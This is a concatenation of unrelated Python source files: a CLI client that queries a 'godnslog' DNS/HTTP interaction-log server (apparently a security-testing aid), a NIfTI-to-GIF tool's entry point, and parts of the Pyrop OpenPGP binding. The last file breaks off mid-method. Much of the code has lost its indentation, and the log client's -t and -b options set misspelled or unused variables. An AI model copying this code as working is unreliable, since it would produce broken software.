self.host = 'https://' + domain
@staticmethod
def hash(query):
m = hashlib.new('md5')
keys = list(query.keys())
keys.sort()
for key in keys:
m.update(query[key].encode(encoding='UTF-8'))
m.update(secret.encode(encoding='UTF-8'))
return m.hexdigest()
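    # Note (added for clarity): the digest above acts as a request signature. It is the md5
    # hex digest of the query values taken in sorted-key order combined with the shared
    # secret, which the godnslog server is presumably expected to recompute and compare.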
def query_dns(self, q, blur=False):
payload = {}
payload['t'] = str(int(time.time()))
print('t=', int(time.time()), payload['t'])
payload['q'] = q
if blur:
payload['blur'] = '1'
else:
payload['blur'] = '0'
payload['hash'] = Client.hash(payload)
r = requests.get(self.host + '/data/dns', payload)
print('resp:', r.text)
j = json.loads(r.text)
if r.status_code == 200:
return j['result'], j['message']
else:
return None, j['message']
def query_http(self, q, blur):
payload = {}
        payload['t'] = str(int(time.time()))
payload['q'] = q
if blur:
payload['blur'] = '1'
else:
payload['blur'] = '0'
payload['hash'] = Client.hash(payload)
r = requests.get(self.host + '/data/http', payload)
print('resp:', r.text)
j = json.loads(r.text)
if r.status_code == 200:
return j['result'], j['message']
else:
return None, j['message']
def usage():
print('cli: query dns/http log result')
sys.exit()
if __name__ == '__main__':
try:
        options, args = getopt.getopt(sys.argv[1:], "hbs:d:t:q:l:", [ "help", "blur", "ssl", "domain=", "secret=", "query=", "type=" ])
except getopt.GetoptError as err:
# print help information and exit:
print(err) # will print something like "option -a not recognized"
usage()
sys.exit(2)
secret = ''
domain = ''
ssl = False
type = 'dns'
blur = False
query = ''
for option, value in options:
if option in ("-h", "--help"):
usage()
if option in ("-s", "--secret"):
secret = str(value)
if option in ("-d", "--domain"):
domain = str(value)
if option in ("-q", "--query"):
query = str(value)
if option in ("-t", "--type"):
cmd = str(value)
if option in ("-b", "--bulr"):
bulr = True
if option in ("-l", "--ssl"):
ssl = True
if secret == '' or domain == '' or query == '':
print("secret,domain,query are required")
sys.exit()
c = Client(domain, secret, ssl)
if type == 'dns':
r, m = c.query_dns(query, blur)
print(m, r)
elif type == 'http':
r,m = c.query_http(query, blur)
print(m, r)
else:
print('unknown type', type, 'only support dns/http')
``` |
{
"source": "joke1196/gif_your_nifti",
"score": 2
} |
#### File: gif_your_nifti/gif_your_nifti/__main__.py
```python
import argparse
import gif_your_nifti.config as cfg
from gif_your_nifti import core, __version__
import warnings # mainly for ignoring imageio warnings
warnings.filterwarnings("ignore")
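# Illustrative invocation (hypothetical file name; flags mirror the argparse options below):
#   python -m gif_your_nifti --mode pseudocolor --cmap plasma --fps 20 brain.nii.gz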
def main():
"""Commandline interface."""
parser = argparse.ArgumentParser()
parser.add_argument(
'filename', metavar='path', nargs='+',
help="Path to image. Multiple paths can be provided."
)
parser.add_argument(
'--mode', type=str, required=False,
metavar=cfg.mode, default=cfg.mode,
help="Gif creation mode. Available options are: 'normal', \
'pseudocolor', 'depth', 'rgb'"
)
parser.add_argument(
'--fps', type=int, required=False,
metavar=cfg.fps, default=cfg.fps,
help="Frames per second."
)
parser.add_argument(
'--size', type=float, required=False,
metavar=cfg.size, default=cfg.size,
help="Image resizing factor."
)
parser.add_argument(
'--cmap', type=str, required=False,
metavar=cfg.cmap, default=cfg.cmap,
help="Color map. Used only in combination with 'pseudocolor' mode."
)
parser.add_argument(
'--output', type=str, required=False,
metavar=cfg.output, default=cfg.output,
help="Define a name for the output file"
)
parser.add_argument(
'--pixel_num', type=int, required=False,
metavar=cfg.pixel_num, default=cfg.pixel_num,
help="Define a maximum size for the output image"
)
args = parser.parse_args()
cfg.mode = (args.mode).lower()
cfg.size = args.size
cfg.fps = args.fps
cfg.cmap = args.cmap
cfg.output = args.output
cfg.pixel_num = args.pixel_num
# Welcome message
welcome_str = '{} {}'.format('gif_your_nifti', __version__)
welcome_decor = '=' * len(welcome_str)
print('{}\n{}\n{}'.format(welcome_decor, welcome_str, welcome_decor))
print('Selections:')
print(' mode = {}'.format(cfg.mode))
print(' fps = {}'.format(cfg.fps))
print(' outputfile = {}'.format(cfg.output))
print(' pixel_num = {}'.format(cfg.pixel_num))
# Determine gif creation mode
if cfg.mode in ['normal', 'pseudocolor', 'depth']:
for f in args.filename:
if cfg.mode == 'normal':
core.write_gif_normal(f, cfg.output, cfg.pixel_num,cfg.size, cfg.fps)
elif cfg.mode == 'pseudocolor':
print(' cmap = {}'.format(cfg.cmap))
core.write_gif_pseudocolor(f, cfg.output, cfg.pixel_num, cfg.size, cfg.fps, cfg.cmap)
elif cfg.mode == 'depth':
core.write_gif_depth(f, cfg.output, cfg.pixel_num,cfg.size, cfg.fps)
elif cfg.mode == 'rgb':
if len(args.filename) != 3:
raise ValueError('RGB mode requires 3 input files.')
else:
core.write_gif_rgb(args.filename[0], args.filename[1],
args.filename[2], cfg.pixel_num,cfg.size, cfg.fps)
else:
raise ValueError("Unrecognized mode.")
print('Finished.')
if __name__ == "__main__":
main()
``` |
{
"source": "joke325/Py3rop",
"score": 2
} |
#### File: Py3rop/pyrop/op.py
```python
__version__ = "0.3.0"
# Copyright (c) 2020 Janky <<EMAIL>>
# All right reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
from weakref import ref as weakref
from .rop.err import ROPE
from .error import RopError
from .util import _call_rop_func, _new_rop_obj, _get_rop_string, _timedelta2sec, \
_ts2datetime, _datetime2ts
from .key import RopKey
from .sign import RopSign
class RopSignSignature(object):
'''OP Sign Signature proxy
'''
def __init__(self, own, sgid):
self.__own = weakref(own)
self.__lib = own.lib
if sgid is None or sgid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__sgid = sgid
@property
def handle(self): return self.__sgid
# API
def set_hash(self, hash_):
_call_rop_func(self.__lib.rnp_op_sign_signature_set_hash, 0, self.__sgid, hash_)
def set_creation_time(self, create):
_call_rop_func(self.__lib.rnp_op_sign_signature_set_creation_time, 0, self.__sgid, \
_datetime2ts(create))
def set_expiration_time(self, expires):
_call_rop_func(self.__lib.rnp_op_sign_signature_set_expiration_time, 0, self.__sgid, \
_datetime2ts(expires))
class RopOpSign(object):
'''OP Sign proxy
'''
def __init__(self, own, opid):
self.__own = weakref(own)
self.__lib = own.lib
if opid is None or opid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__opid = opid
def _close(self):
ret = self.__lib.rnp_op_sign_destroy(self.__opid)
self.__opid = None
return ret
@property
def handle(self): return self.__opid
# API
def set_compression(self, compression, level):
_call_rop_func(self.__lib.rnp_op_sign_set_compression, 0, self.__opid, compression, level)
def set_armor(self, armored):
_call_rop_func(self.__lib.rnp_op_sign_set_armor, 0, self.__opid, armored)
def set_hash(self, hash_):
_call_rop_func(self.__lib.rnp_op_sign_set_hash, 0, self.__opid, hash_)
def set_creation_time(self, create):
_call_rop_func(self.__lib.rnp_op_sign_set_creation_time, 0, self.__opid, \
_datetime2ts(create))
def set_expiration_time(self, expire):
_call_rop_func(self.__lib.rnp_op_sign_set_expiration_time, 0, self.__opid, \
_datetime2ts(expire))
def set_expiration(self, expiration):
_call_rop_func(self.__lib.rnp_op_sign_set_expiration_time, 0, self.__opid, \
_timedelta2sec(expiration))
def set_file_name(self, filename):
_call_rop_func(self.__lib.rnp_op_sign_set_file_name, 0, self.__opid, filename)
def set_file_mtime(self, mtime):
_call_rop_func(self.__lib.rnp_op_sign_set_file_mtime, 0, self.__opid, \
_datetime2ts(mtime))
def execute(self):
_call_rop_func(self.__lib.rnp_op_sign_execute, 0, self.__opid)
def add_signature(self, key):
hkey = (key.handle if key is not None else None)
sig = _call_rop_func(self.__lib.rnp_op_sign_add_signature, 1, self.__opid, hkey)
return RopSignSignature(self.__own(), sig)
class RopOpGenerate(object):
'''OP Generate proxy
'''
def __init__(self, own, opid):
self.__own = weakref(own)
self.__lib = own.lib
if opid is None or opid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__opid = opid
def _close(self):
ret = self.__lib.rnp_op_generate_destroy(self.__opid)
self.__opid = None
return ret
@property
def handle(self): return self.__opid
# API
def set_bits(self, bits):
_call_rop_func(self.__lib.rnp_op_generate_set_bits, 0, self.__opid, bits)
def set_hash(self, hash_):
_call_rop_func(self.__lib.rnp_op_generate_set_hash, 0, self.__opid, hash_)
def set_dsa_qbits(self, qbits):
_call_rop_func(self.__lib.rnp_op_generate_set_dsa_qbits, 0, self.__opid, qbits)
def set_curve(self, curve):
_call_rop_func(self.__lib.rnp_op_generate_set_curve, 0, self.__opid, curve)
def set_protection_password(self, password):
_call_rop_func(self.__lib.rnp_op_generate_set_protection_password, 0, self.__opid, password)
def set_request_password(self, request):
_call_rop_func(self.__lib.rnp_op_generate_set_request_password, 0, self.__opid, request)
def set_protection_cipher(self, cipher):
_call_rop_func(self.__lib.rnp_op_generate_set_protection_cipher, 0, self.__opid, cipher)
def set_protection_hash(self, hash_):
_call_rop_func(self.__lib.rnp_op_generate_set_protection_hash, 0, self.__opid, hash_)
def set_protection_mode(self, mode):
_call_rop_func(self.__lib.rnp_op_generate_set_protection_mode, 0, self.__opid, mode)
def set_protection_iterations(self, iterations):
_call_rop_func(self.__lib.rnp_op_generate_set_protection_iterations, 0, self.__opid, \
iterations)
def add_usage(self, usage):
_call_rop_func(self.__lib.rnp_op_generate_add_usage, 0, self.__opid, usage)
def clear_usage(self):
_call_rop_func(self.__lib.rnp_op_generate_clear_usage, 0, self.__opid)
def set_usages(self, usages):
self.clear_usage()
for usage in usages:
self.add_usage(usage)
def set_userid(self, userid):
_call_rop_func(self.__lib.rnp_op_generate_set_userid, 0, self.__opid, userid)
def set_expiration(self, expiration):
_call_rop_func(self.__lib.rnp_op_generate_set_expiration, 0, self.__opid, \
_timedelta2sec(expiration))
def add_pref_hash(self, hash_):
_call_rop_func(self.__lib.rnp_op_generate_add_pref_hash, 0, self.__opid, hash_)
def clear_pref_hashes(self):
_call_rop_func(self.__lib.rnp_op_generate_clear_pref_hashes, 0, self.__opid)
def set_pref_hashes(self, hashes):
self.clear_pref_hashes()
for hash_ in hashes:
self.add_pref_hash(hash_)
def add_pref_compression(self, compression):
_call_rop_func(self.__lib.rnp_op_generate_add_pref_compression, 0, self.__opid, compression)
def clear_pref_compression(self):
_call_rop_func(self.__lib.rnp_op_generate_clear_pref_compression, 0, self.__opid)
def set_pref_compressions(self, compressions):
self.clear_pref_compression()
for compression in compressions:
self.add_pref_compression(compression)
def add_pref_cipher(self, cipher):
_call_rop_func(self.__lib.rnp_op_generate_add_pref_cipher, 0, self.__opid, cipher)
def clear_pref_ciphers(self):
_call_rop_func(self.__lib.rnp_op_generate_clear_pref_ciphers, 0, self.__opid)
def set_pref_ciphers(self, ciphers):
self.clear_pref_ciphers()
for cipher in ciphers:
self.add_pref_cipher(cipher)
def set_pref_keyserver(self, keyserver):
_call_rop_func(self.__lib.rnp_op_generate_set_pref_keyserver, 0, self.__opid, keyserver)
def execute(self):
_call_rop_func(self.__lib.rnp_op_generate_execute, 0, self.__opid)
def get_key(self, tag=0):
handle = _call_rop_func(self.__lib.rnp_op_generate_get_key, 1, self.__opid)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, handle, RopKey, tag)
class RopOpEncrypt(object):
'''OP Encrypt proxy
'''
def __init__(self, own, opid):
self.__own = weakref(own)
self.__lib = own.lib
if opid is None or opid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__opid = opid
def _close(self):
ret = self.__lib.rnp_op_encrypt_destroy(self.__opid)
self.__opid = None
return ret
@property
def handle(self): return self.__opid
# API
def add_recipient(self, key):
hkey = (key.handle if key is not None else None)
_call_rop_func(self.__lib.rnp_op_encrypt_add_recipient, 0, self.__opid, hkey)
def add_signature(self, key):
hkey = (key.handle if key is not None else None)
hop = _call_rop_func(self.__lib.rnp_op_encrypt_add_signature, 1, self.__opid, hkey)
return RopSignSignature(self.__own(), hop)
def set_hash(self, hash_):
_call_rop_func(self.__lib.rnp_op_encrypt_set_hash, 0, self.__opid, hash_)
def set_creation_time(self, create):
_call_rop_func(self.__lib.rnp_op_encrypt_set_creation_time, 0, self.__opid, \
_datetime2ts(create))
def set_expiration_time(self, expire):
_call_rop_func(self.__lib.rnp_op_encrypt_set_expiration_time, 0, self.__opid, \
_datetime2ts(expire))
def add_password(self, password, s2k_hash, iterations, s2k_cipher):
_call_rop_func(self.__lib.rnp_op_encrypt_add_password, 0, self.__opid, password, \
s2k_hash, iterations, s2k_cipher)
def set_armor(self, armored):
_call_rop_func(self.__lib.rnp_op_encrypt_set_armor, 0, self.__opid, armored)
def set_cipher(self, cipher):
_call_rop_func(self.__lib.rnp_op_encrypt_set_cipher, 0, self.__opid, cipher)
def set_aead(self, alg):
_call_rop_func(self.__lib.rnp_op_encrypt_set_aead, 0, self.__opid, alg)
def set_aead_bits(self, bits):
_call_rop_func(self.__lib.rnp_op_encrypt_set_aead_bits, 0, self.__opid, bits)
def set_compression(self, compression, level):
_call_rop_func(self.__lib.rnp_op_encrypt_set_compression, 0, self.__opid, \
compression, level)
def set_file_name(self, filename):
_call_rop_func(self.__lib.rnp_op_encrypt_set_file_name, 0, self.__opid, filename)
def set_file_mtime(self, mtime):
_call_rop_func(self.__lib.rnp_op_encrypt_set_file_mtime, 0, self.__opid, \
_datetime2ts(mtime))
def execute(self):
_call_rop_func(self.__lib.rnp_op_encrypt_execute, 0, self.__opid)
class RopVeriSignature(object):
'''OP Verify Signature proxy
'''
def __init__(self, own, sgid):
self.__own = weakref(own)
self.__lib = own.lib
if sgid is None or sgid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__sgid = sgid
@property
def handle(self): return self.__sgid
# API
@property
def hash(self):
hash_ = _call_rop_func(self.__lib.rnp_op_verify_signature_get_hash, 1, self.__sgid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, hash_)
@property
def status(self):
return self.__lib.rnp_op_verify_signature_get_status(self.__sgid)
def get_handle(self, tag=0):
handle = _call_rop_func(self.__lib.rnp_op_verify_signature_get_handle, 1, self.__sgid)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, handle, RopSign, tag)
def get_key(self, tag=0):
hkey = _call_rop_func(self.__lib.rnp_op_verify_signature_get_key, 1, self.__sgid)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, hkey, RopKey, tag)
def get_times(self):
tm1, tm2 = _call_rop_func(self.__lib.rnp_op_verify_signature_get_times, 2, self.__sgid)
return _ts2datetime(tm1), _ts2datetime(tm2)
class RopRecipient(object):
'''OP Recipient
'''
def __init__(self, own, rid):
self.__own = weakref(own)
self.__lib = own.lib
if rid is None or rid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__rid = rid
@property
def handle(self): return self.__rid
# API
@property
def keyid(self):
kid = _call_rop_func(self.__lib.rnp_recipient_get_keyid, 1, self.__rid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, kid)
@property
def alg(self):
alg = _call_rop_func(self.__lib.rnp_recipient_get_alg, 1, self.__rid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, alg)
class RopSymEnc(object):
'''OP Symenc
'''
def __init__(self, own, seid):
self.__own = weakref(own)
self.__lib = own.lib
if seid is None or seid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__seid = seid
@property
def handle(self): return self.__seid
# API
@property
def cipher(self):
cip = _call_rop_func(self.__lib.rnp_symenc_get_cipher, 1, self.__seid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, cip)
@property
def aead_alg(self):
alg = _call_rop_func(self.__lib.rnp_symenc_get_aead_alg, 1, self.__seid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, alg)
@property
def hash_alg(self):
alg = _call_rop_func(self.__lib.rnp_symenc_get_hash_alg, 1, self.__seid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, alg)
@property
def s2k_type(self):
s2k = _call_rop_func(self.__lib.rnp_symenc_get_s2k_type, 1, self.__seid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, s2k)
@property
def s2k_iterations(self):
return _call_rop_func(self.__lib.rnp_symenc_get_s2k_iterations, 1, self.__seid)
class RopOpVerify(object):
'''OP Verify proxy
'''
def __init__(self, own, opid):
self.__own = weakref(own)
self.__lib = own.lib
if opid is None or opid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__opid = opid
def _close(self):
ret = self.__lib.rnp_op_verify_destroy(self.__opid)
self.__opid = None
return ret
@property
def handle(self): return self.__opid
# API
@property
def signature_count(self):
return _call_rop_func(self.__lib.rnp_op_verify_get_signature_count, 1, self.__opid)
def execute(self):
_call_rop_func(self.__lib.rnp_op_verify_execute, 0, self.__opid)
def get_signature_at(self, idx):
sig = _call_rop_func(self.__lib.rnp_op_verify_get_signature_at, 1, self.__opid, idx)
return RopVeriSignature(self.__own(), sig)
def get_file_info(self):
filename, mtime = _call_rop_func(self.__lib.rnp_op_verify_get_file_info, 2, self.__opid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, filename), _ts2datetime(mtime)
def get_protection_info(self):
# F() -> (mode: str, cipher: str, valid: bool)
mode, cipher, valid = _call_rop_func(self.__lib.rnp_op_verify_get_protection_info, 3, self.__opid)
cipher = _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, cipher)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, mode), cipher, valid
@property
def recipient_count(self):
return _call_rop_func(self.__lib.rnp_op_verify_get_recipient_count, 1, self.__opid)
@property
def used_recipient(self):
rcp = _call_rop_func(self.__lib.rnp_op_verify_get_used_recipient, 1, self.__opid)
return RopRecipient(self.__own(), rcp) if rcp.value is not None else None
def get_recipient_at(self, idx):
rcp = _call_rop_func(self.__lib.rnp_op_verify_get_recipient_at, 1, self.__opid, idx)
return RopRecipient(self.__own(), rcp) if rcp.value is not None else None
@property
def symenc_count(self):
return _call_rop_func(self.__lib.rnp_op_verify_get_symenc_count, 1, self.__opid)
@property
def used_symenc(self):
senc = _call_rop_func(self.__lib.rnp_op_verify_get_used_symenc, 1, self.__opid)
return RopSymEnc(self.__own(), senc) if senc.value is not None else None
def get_symenc_at(self, idx):
senc = _call_rop_func(self.__lib.rnp_op_verify_get_symenc_at, 1, self.__opid, idx)
return RopSymEnc(self.__own(), senc) if senc.value is not None else None
``` |
{
"source": "joke325/Pyrop",
"score": 2
} |
#### File: Pyrop/examples/decrypt.py
```python
from pyrop.bind import RopBind
from pyrop.error import RopError
message = "Dummy"
def example_pass_provider(session, app_ctx, key, pgp_context, buf_len):
if pgp_context == 'decrypt (symmetric)':
return True, 'encpassword'
if pgp_context == 'decrypt':
return True, 'password'
return False, None
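# Note (added for clarity): the provider returns a (handled, password) pair -- True plus the
# password string when it recognizes the pgp_context, and (False, None) to signal that no
# password is supplied. The passwords above presumably match the example keyring files.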
def decrypt(rop, usekeys):
alt = rop.tagging()
try:
# initialize FFI object
ses = rop.create_session(rop.KEYSTORE_GPG, rop.KEYSTORE_GPG)
# check whether we want to use key or password for decryption
if usekeys:
try:
# load secret keyring, as it is required for public-key decryption. However, you may
# need to load public keyring as well to validate key's signatures.
keyfile = rop.create_input(path="secring.pgp")
# we may use secret=True and public=True as well
ses.load_keys(rop.KEYSTORE_GPG, keyfile, secret=True)
except RopError:
print("Failed to read secring")
raise
finally:
rop.drop(object_=keyfile)
# set the password provider
ses.set_pass_provider(example_pass_provider, None)
try:
# create file input and memory output objects for the encrypted message and decrypted
# message
input_ = rop.create_input(path="encrypted.asc")
output = rop.create_output(max_alloc=0)
ses.decrypt(input_, output)
# get the decrypted message from the output structure
buf = output.memory_get_str(False)
except RopError:
print("Public-key decryption failed")
raise
print("Decrypted message ({}):\n{}\n".format("with key" if usekeys else \
"with password", buf))
global message
message = buf
finally:
rop.drop(from_=alt)
def execute():
rop = RopBind()
try:
decrypt(rop, True)
decrypt(rop, False)
finally:
rop.close()
if __name__ == '__main__':
execute()
```
#### File: Pyrop/pyrop/key.py
```python
__version__ = "0.14.0"
# Copyright (c) 2020 Janky <<EMAIL>>
# All right reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
from weakref import ref as weakref
from datetime import datetime, timedelta
from .rop.lib import ROPD
from .rop.err import ROPE
from .error import RopError
from .util import _get_rop_data, _call_rop_func, _new_rop_obj, _get_str_prop, _ts2datetime, \
_timedelta2sec
class RopUidHandle(object):
'''UID proxy
'''
def __init__(self, own, huid):
self.__own = weakref(own)
self.__lib = own.lib
if huid is None or huid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__huid = huid
def _close(self):
ret = self.__lib.rnp_uid_handle_destroy(self.__huid)
self.__huid = None
return ret
@property
def handle(self): return self.__huid
# API
def get_type(self):
return _call_rop_func(self.__lib.rnp_uid_get_type, 1, self.__huid)
def get_data(self):
data, dlen = _call_rop_func(self.__lib.rnp_uid_get_data, 2, self.__huid)
return _get_rop_data(self.__lib, ROPE.RNP_SUCCESS, data, dlen)
@property
def is_primary(self):
return _call_rop_func(self.__lib.rnp_uid_is_primary, 1, self.__huid)
@property
def is_valid(self):
return _call_rop_func(self.__lib.rnp_uid_is_valid, 1, self.__huid)
@property
def signature_count(self):
return _call_rop_func(self.__lib.rnp_uid_get_signature_count, 1, self.__huid)
@property
def is_revoked(self):
return _call_rop_func(self.__lib.rnp_uid_is_revoked, 1, self.__huid)
def get_signature_at(self, idx, tag=0):
sign = _call_rop_func(self.__lib.rnp_uid_get_signature_at, 1, self.__huid, idx)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, sign, RopSign, tag)
def get_revocation_signature(self, tag=0):
sign = _call_rop_func(self.__lib.rnp_uid_get_revocation_signature, 1, self.__huid)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, sign, RopSign, tag)
class RopKey(object):
'''Key proxy
'''
def __init__(self, own, kid):
self.__own = weakref(own)
self.__lib = own.lib
if kid is None or kid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__kid = kid
def _close(self):
ret = ROPE.RNP_SUCCESS
if self.__kid is not None:
ret = self.__lib.rnp_key_handle_destroy(self.__kid)
self.__kid = None
return ret
def _detach(self):
self.__kid = None
@property
def handle(self): return self.__kid
# API
@property
def keyid(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_keyid, self.__kid)
@property
def alg(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_alg, self.__kid)
@property
def primary_grip(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_primary_grip, self.__kid)
@property
def primary_fprint(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_primary_fprint, self.__kid)
@property
def fprint(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_fprint, self.__kid)
@property
def grip(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_grip, self.__kid)
@property
def primary_uid(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_primary_uid, self.__kid)
@property
def curve(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_curve, self.__kid)
@property
def revocation_reason(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_revocation_reason, self.__kid)
def set_expiration(self, expiry):
        _call_rop_func(self.__lib.rnp_key_set_expiration, 0, self.__kid, _timedelta2sec(expiry))
@property
def is_valid(self):
return _call_rop_func(self.__lib.rnp_key_is_valid, 1, self.__kid)
@property
def valid_till(self):
tms = _call_rop_func(self.__lib.rnp_key_valid_till, 1, self.__kid)
dtime = _ts2datetime(tms)
        if tms == 0:
            dtime = datetime.min
        elif tms == 0xffffffff:
            dtime = datetime.max
return dtime
@property
def is_revoked(self):
return _call_rop_func(self.__lib.rnp_key_is_revoked, 1, self.__kid)
@property
def is_superseded(self):
return _call_rop_func(self.__lib.rnp_key_is_superseded, 1, self.__kid)
@property
def is_compromised(self):
return _call_rop_func(self.__lib.rnp_key_is_compromised, 1, self.__kid)
@property
def is_retired(self):
return _call_rop_func(self.__lib.rnp_key_is_retired, 1, self.__kid)
@property
def is_locked(self):
return _call_rop_func(self.__lib.rnp_key_is_locked, 1, self.__kid)
@property
def protection_type(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_protection_type, self.__kid)
@property
def protection_mode(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_protection_mode, self.__kid)
@property
def protection_cipher(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_protection_cipher, self.__kid)
@property
def protection_hash(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_protection_hash, self.__kid)
@property
def protection_iterations(self):
return _call_rop_func(self.__lib.rnp_key_get_protection_iterations, 1, self.__kid)
@property
def is_protected(self):
return _call_rop_func(self.__lib.rnp_key_is_protected, 1, self.__kid)
@property
def is_primary(self):
return _call_rop_func(self.__lib.rnp_key_is_primary, 1, self.__kid)
@property
def is_sub(self):
return _call_rop_func(self.__lib.rnp_key_is_sub, 1, self.__kid)
@property
def have_secret(self):
return _call_rop_func(self.__lib.rnp_key_have_secret, 1, self.__kid)
@property
def have_public(self):
return _call_rop_func(self.__lib.rnp_key_have_public, 1, self.__kid)
@property
def creation(self):
tms = _call_rop_func(self.__lib.rnp_key_get_creation, 1, self.__kid)
return _ts2datetime(tms)
@property
def expiration(self):
return timedelta(seconds=_call_rop_func(self.__lib.rnp_key_get_expiration, 1, self.__kid))
@property
def uid_count(self):
return _call_rop_func(self.__lib.rnp_key_get_uid_count, 1, self.__kid)
@property
def signature_count(self):
return _call_rop_func(self.__lib.rnp_key_get_signature_count, 1, self.__kid)
@property
def bits(self):
return _call_rop_func(self.__lib.rnp_key_get_bits, 1, self.__kid)
@property
def dsa_qbits(self):
return _call_rop_func(self.__lib.rnp_key_get_dsa_qbits, 1, self.__kid)
@property
def subkey_count(self):
return _call_rop_func(self.__lib.rnp_key_get_subkey_count, 1, self.__kid)
def get_uid_at(self, idx):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_uid_at, self.__kid, idx)
def to_json(self, public_mpis=False, secret_mpis=False, signatures=False, sign_mpis=False):
flags = (ROPD.RNP_JSON_PUBLIC_MPIS if public_mpis else 0)
flags |= (ROPD.RNP_JSON_SECRET_MPIS if secret_mpis else 0)
flags |= (ROPD.RNP_JSON_SIGNATURES if signatures else 0)
flags |= (ROPD.RNP_JSON_SIGNATURE_MPIS if sign_mpis else 0)
return _get_str_prop(self.__lib, self.__lib.rnp_key_to_json, self.__kid, flags)
def packets_to_json(self, secret, mpi=False, raw=False, grip=False):
flags = (ROPD.RNP_JSON_DUMP_MPI if mpi else 0)
flags |= (ROPD.RNP_JSON_DUMP_RAW if raw else 0)
flags |= (ROPD.RNP_JSON_DUMP_GRIP if grip else 0)
return _get_str_prop(self.__lib, self.__lib.rnp_key_packets_to_json, self.__kid, \
secret, flags)
def allows_usage(self, usage):
return _call_rop_func(self.__lib.rnp_key_allows_usage, 1, self.__kid, usage)
def allows_usages(self, usages):
for usage in usages:
if not self.allows_usage(usage):
return False
return True
def disallows_usages(self, usages):
for usage in usages:
if self.allows_usage(usage):
return False
return True
def lock(self):
